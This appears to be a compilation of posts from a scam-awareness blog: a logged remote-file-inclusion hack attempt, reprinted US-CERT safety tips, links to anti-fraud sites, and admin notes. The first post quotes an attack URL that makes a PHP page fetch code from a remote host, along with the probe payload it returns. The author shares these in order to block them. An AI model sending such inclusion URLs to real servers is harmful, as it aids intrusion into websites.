There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press‘. So, can someone clever please tell me why this simple url hangs up a bunch of seemingly dissimilar web servers:
http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?
My banana was once part of a bunch very similar to this one
Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obviousl hack-attempts is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly ‘go away page‘ 
.
In this case, the URL carries a payload that is itself a link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in it’s entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ’sKriptKiDee’, aka ‘Wanker’ on the sending end.
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on it’s back?
Analyzing the url gets me to this reduction of required parts:
* any .php file path.
* any query string, that contains a ‘http://’ in
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’
will cause the same problem on an awful lot of famous name servers. For example, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.
For example, in the following link, everything except ‘www.amazon.com’ is made up
http://www.amazon.com/a.php?b=http://c.gif?
but it still exhibits the same behaviour – WTF is going on?
and why, oh why can’t I detect it in my .htaccess file?
First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.
gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.
Good luck!
_________________________________
Still no replies and it’s still happening…. where have all the gurus gone?
In my infrequent callouts to other websites that (like Scamdex) were created out of the blind fury experinced by seeing bad people taking money from good people, I have another site for you to take notice of.
But first, a recap:
When Scamdex started in 2004, there were very few sites about scams and Internet fraud; we felt there was a need to educate people and, using the power of Search Engines, set out to make it easy to check on emails and websites.
Since then, the field has grown – lots of Government-funded sites have sprung up, large Internet organizations have (finally) acknowledged that fraud does happen and now devote precious pages to warning their customers “it’s not our fault, please don’t bother trying to sue us” “there are unscrupulous people out there so please don’t use Western Union to but Laptops from Nigeria” etc…
But still Scamdex and the many other privately run websites continue in their (often one-manned) struggle against the odds and so to one of these: ‘BobBear’
Bob Bear Website Logo
Bobbear.co.uk is a voluntary, non-profit site dedicated to providing information on fake companies offering part-time, work from home job scams, in particular money mule or money transfer fraud, aka ‘payment transfer agent’ scams and the related reshipping fraud or ‘parcels agent’ scams. They also provide victim advice and support. If you receive a suspect spam offering you a job or find a website offering fraud jobs then please send them (and us) a copy.
Please support them – you know it makes sense!
Cyber Security Tip ST06-008 Safeguarding Your Data
When there are multiple people using your computer and/or you store sensitive personal and work-related data on your computer, it is especially important to take extra security precautions.
Why isn’t “more” better?
Maybe there is an extra software program included with a program you bought. Or perhaps you found a free download online. You may be tempted to install the programs just because you can, or because you think you might use them later. However, even if the source and the software are legitimate, there may be hidden risks. And if other people use your computer, there are additional risks.
These risks become especially important if you use your computer to manage your personal finances (banking, taxes, online bill payment, etc.), store sensitive personal data, or perform work-related activities away from the office. However, there are steps you can take to protect yourself.
How can you protect both your personal and work-related data?
1. Use and maintain anti-virus software and a firewall – Protect yourself against viruses and Trojan horses that may steal or modify the data on your own computer and leave you vulnerable by using anti-virus software and a firewall (see Understanding Anti-Virus Software and Understanding Firewalls for more information). Make sure to keep your virus definitions up to date.
2. Regularly scan your computer for spyware – Spyware or adware hidden in software programs may affect the performance of your computer and give attackers access to your data. Use a legitimate anti-spyware program to scan your computer and remove any of these files (see Recognizing and Avoiding Spyware for more information). Many anti-virus products have incorporated spyware detection.
3. Keep software up to date – Install software patches so that attackers cannot take advantage of known problems or vulnerabilities (see Understanding Patches for more information). Many operating systems offer automatic updates. If this option is available, you should turn it on.
4. Evaluate your software’s settings – The default settings of most software enable all available functionality. However, attackers may be able to take advantage of this functionality to access your computer. It is especially important to check the settings for software that connects to the internet (browsers, email clients, etc.). Apply the highest level of security available that still gives you the functionality you need.
5. Avoid unused software programs – Do not clutter your computer with unnecessary software programs. If you have programs on your computer that you do not use, consider uninstalling them. In addition to consuming system resources, these programs may contain vulnerabilities that, if not patched, may allow an attacker to access your computer.
6. Consider creating separate user accounts – If there are other people using your computer, you may be worried that someone else may accidentally access, modify, and/or delete your files. Most operating systems (including Windows XP and Vista, Mac OS X, and Linux) give you the option of creating a different user account for each user, and you can set the amount of access and privileges for each account. You may also choose to have separate accounts for your work and personal
purposes. While this approach will not completely isolate each area, it does offer some additional protection. However, it will not protect your computer against vulnerabilities that give an attacker administrative privileges. Ideally, you will have separate computers for work and personal use; this will offer a different type of protection.
7. Establish guidelines for computer use – If there are multiple people using your computer, especially children, make sure they understand how to use the computer and internet safely. Setting boundaries and guidelines will help to protect your data (see Keeping Children Safe Online for more information).
8. Use passwords and encrypt sensitive files – Passwords and other security features add layers of protection if used appropriately (see Choosing and Protecting Passwords and Supplementing Passwords for more information). By encrypting files, you ensure that unauthorized people
can’t view data even if they can physically access it. You may also want to consider options for full disk encryption, which prevents a thief from even starting your laptop without a passphrase. When you use encryption, it is important to remember your passwords and passphrases; if you forget or lose them, you may lose your data.
9. Follow corporate policies for handling and storing work-related information – If you use your computer for work-related purposes, make sure to follow any corporate policies for handling and storing the information. These policies were likely established to protect proprietary information and customer data, as well as to protect you and the company from liability. Even if it is not explicitly stated in your corporate policy, you should avoid allowing other people, including family members, to use a computer that contains corporate data.
10. Dispose of sensitive information properly – Simply deleting a file does not completely erase it. To ensure that an attacker cannot access these files, make sure that you adequately erase sensitive files (see Effectively Erasing Files for more information).
11. Follow good security habits – Review other security tips for ways to protect yourself and your data.
_________________________________________________________________
Author: Mindi McDowell Produced 2006 by US-CERT, a government organization.
<http://www.us-cert.gov/cas/tips/ST06-008.html>
Sooooo I went to the ZZN.com website, a free email service provider – it’s been around for years and does not seem to be going anywhere soon – and created a SCAMDEX.ZZN.COM email service – so you can go there and get a mystoopidname@scamdex.zzn.com email address to use and abuse as you wish.
Great if you want to contact someone but don’t want the relationship to continue…. not sure if you’re being scammed? create a new email address, give that out and if it all turns cruddy, just walk away. The accounts are removed after 30 days of no-use so you can forget all about it.
Beloved of scammers the world over (and especially popular in some of the more western partsof the African subcontinent), the free email address allows the freedom to communicate with no strings attached. it’s nice to be able to put it to a new use. (kind of like a disposable razor).
Anywa, go ahead, get a new email address – don’t go sending any 5 megapixel photos there though, it’s only got 3MB quota!
One word of warning – ZZN are quite happy to pass on details to law enforcement officials so no scamming please!
I am an old Unix dude, I have installed more different versions of Unix than most people – Everything from Sco Xenix/286 thru to Centos5.2 and I don’t usually have much problems – but as time wears on, my brainDisk is starting to squeal and it’s not as fast at random access as it used to be so I was really happy when I rented a server with Cpanel/WHM installed on it.
For those who don’t know, Cpanel is the web-based interface to everything you will never learn on a Unix server – plus, the WHM super system allows you to carve off a chunk and sell it or give it away to your pals, reasonably confident that they won’t/can’t screw it up.
Add in virtual web/mail/log server management and lots of useful pre-installed tools and you have a system where you rarely have to get your hands dirty under the #hood.
Well, I love Cpanel now and I have grown to rely on it (curses!) so when it comes to creating my own server, so I can save money on a dedicated one I find I need it to get things done (and my old stuff transferred.
The problem with CP is that it costs $$money. between $30 and $48/month. and. I. just. don’t. want. to. pay. that. any. more….. so….
Piracy is out – mainly because you need to register the license with CP and also because that’s bad!:’(
Perhaps I could install it, setup my system the way I want and then after a month or so, hand it back??
well, no apparently – most people (Including themselves) seem to be of the opinion that to uninstall CP, you should really re-install Linux…. kind of defeats my object here!
so…. alternatives, anyone?
There are a few – some other commercial (pay $$ for) such as DirectAdmin and some Public Domain ones (Web-CP, WebMin/VirtualMin). So I started evaluating these free Cpanel Alternatives ….
Looks like it will do the job – only one of the alts that I’ve heard of and actually used before. Installs easily enough and looks nice – has a fine range of functionality but what lets it down is it’s non-simplicity. Cpanel’s approach is to show you a bunch of things that you may want to do and asks sensible questions (with usually relevant tooltips close by) so help you accomplish your requirements. WebMin takes the ‘I’ll help you to write the configuration files correctly’ approach – you really have to know what you’re doing and in a lot of cases, the input fields are just blank with no clue as to what to put there.
WebMin Configuring Backup Example Screenshot
This probably highlights the major difference between CPanel/WHM and the rest of the Server Admin systems out there – CP/WHM does some pretty radical things to your server when you install it and this is why it’s so hard to uninstall. The other systems kind of leave things as they are and just act as configuration helpers. As an example, see the two screenshots of the ‘backup’ functions.
Cpanel Domain Owner Backup Page
Much, much, harder to install and harder to find the installation instructions too. but seems pretty good so far.
I had problems with the PHP startup scripts being written with DOS line endings which confused the life out of me for a while until I found it. Still not able to start the system up but suspect it’s something to do with the line that reads:
$args = trim(next($HTTP_SERVER_VARS["argv"]));
# Shouldn’t that just be ARGV for shell scripts?)
… I’ll continue and let you know how I get on.
Online shopping has become a popular way to purchase items without the hassles of traffic and crowds. However, the Internet has unique risks, so it is important to take steps to protect yourself when shopping online.
Why do online shoppers have to take special precautions?
The Internet offers a convenience that is not available from any other shopping outlet. From the comfort of your home, you can search for items from countless vendors, compare prices with a few simple mouse clicks, and make purchases without waiting in line. However, the Internet is also convenient for attackers, giving them multiple ways to access the personal and financial information of unsuspecting shoppers. Attackers who are able to obtain this information may use it for their own financial gain, either by making purchases themselves or by selling the information to someone else.
How do attackers target online shoppers?
There are three common ways that attackers can take advantage of online shoppers:
How can you protect yourself?
This document can also be found at on the US-CERT Website, HERE
Here are two really good reasons why you should use FireFox to surf the web instead of the ubiquitous Internet Explorer.
Firefox includes strict anti-phishing and anti-malware measures and it’s open source so it has thousands of security experts around the globe working around the clock to keep you (and your personal information) safe.
Firefox 3 protects you from viruses, worms, trojan horses and spyware. If you accidentally access an attack site, you’ll receive a full-sized browser message as a warning. A continuously updated list of attack-sites tells us when to stop you from browsing, so there’s nothing for you to update or maintain.
Anti Malware Warning in FireFox
Shop and do business safely on the Internet. Firefox gets a fresh update of web forgery sites 48 times in a day, so if you try to visit a fraudulent site that’s pretending to be a site you trust (like your bank), a browser message—big as life—will stop you.
The DNS Route to Scam Protection Online.
When you type in ‘www.scammingsite.com’ on your browser, a lookup is performed to translate the domain name into a unique address (IP Address) that all networked computers understand and which contains the path to the right server.
Your ISP will have given you two longish ‘numbers-separated-by-dots’ (eg. 207.44.123.28) to type in to your Network Settings. These are the Domain Name Servers (DNS) that your computer will use whenever you ask to go to a domain name.
Right? Well, never mind, just trust me on this one.
Wouldn’t it be great if, when you did the lookup/translate part, the result was filtered for Scams/Profanity/Pornography/Crime/Violence etc etc?
Well, by changing the DNS servers you use, you can have this great feature – for free, I may ad – and you (and your children/employees) can surf a little easier. No software to download, no subscriptions, no spam – it couldn’t be easier. Free, simple to do, free, great protection …. 
what more can I say other than if you don’t believe me, Click this button to find out why you need to change your DNS servers NOW!
(or, you can just change your DNS servers to 208.67.222.222 and 208.67.220.220 and get on with your life)
BTW, the same people who run OpenDNS.com also run an Anti-Phishing site called, amusingly, PhishTank
It’s my third iteration on the same basic principle: take a carefully filtered and enhanced archive of 150,000 email messages and then sort, categorize and analyze them, then put them in a defanged, indexable/searchable list format so that people can browse them.
The first was a program I wrote in perl back in 2004, it was a POP sucker that connected to the mailbox, attempted to extract message parts and rewrite them as a html page. While successful, I was never happy at my efforts to disentangle nested messages and alternate body parts – this meant that a lot of emails showed up with lots of Base64 and other garbage. (eg. ScamDB_S_74.php)
The next try I had was to use a mail archive indexer program called ‘Hypermail‘. This was mostly successful at splitting messages into component parts but was still not quite flexible enough for my needs and the indexes were way too long. (eg. HYPMAIL/date.php)
So this spring, I am trying a whole new system that I rewrote in PHP, my code of choice for the decade. I am still mailbox based, mainly so that I can prune spam that has sneaked through my filters, but that may change soon.
This is how the Scamdex Engine works:
It’s not pretty or fast but it works, and I can understand it. It’s easy to fix and add to. It’s annoying having to run the process every night from scratch but until I work out how to use the MHONARC system to add/delete emails from the archive, it’s all I can do. Any suggestions about how I can do this better, let me hear them!
(send to scamblog(a)o7e.net)
I give my cellphone number out to very few people. Friends, relatives, Scamdex-related business and the occasional on-line order, if they insist. So when I get a call, it’s normally someone I know personally or business. So I was surprised to get a call from an outfit called ‘Auction Profits LLC’ (http://www.auctionprofitsllc.com) , asking me if I want to make money with drop-shipping on eBay.
After listening to their inept spiel which seems to involve mentioning eBay and MONEY as often as possible, I asked them where they got my phone number and name. The claim was that I had placed an order with another company called ‘Online Supplier’ (http://www.onlinesupplier.com) . They knew my name, address and phone number and indicated that they had additional credit card information as well.
When I persisted, I was zapped to the supervisor who blustered about how I must have bought something from them before and, anyway, how about making some money on eBay?
He completely missed the point that I made that I run a website devoted to exposing scams (such as his) and he dropped my call. I got a weird ‘private’ call a few minutes later (2 minutes of static followed by a ’sorry wrong number’) which I strongly suspect was them.
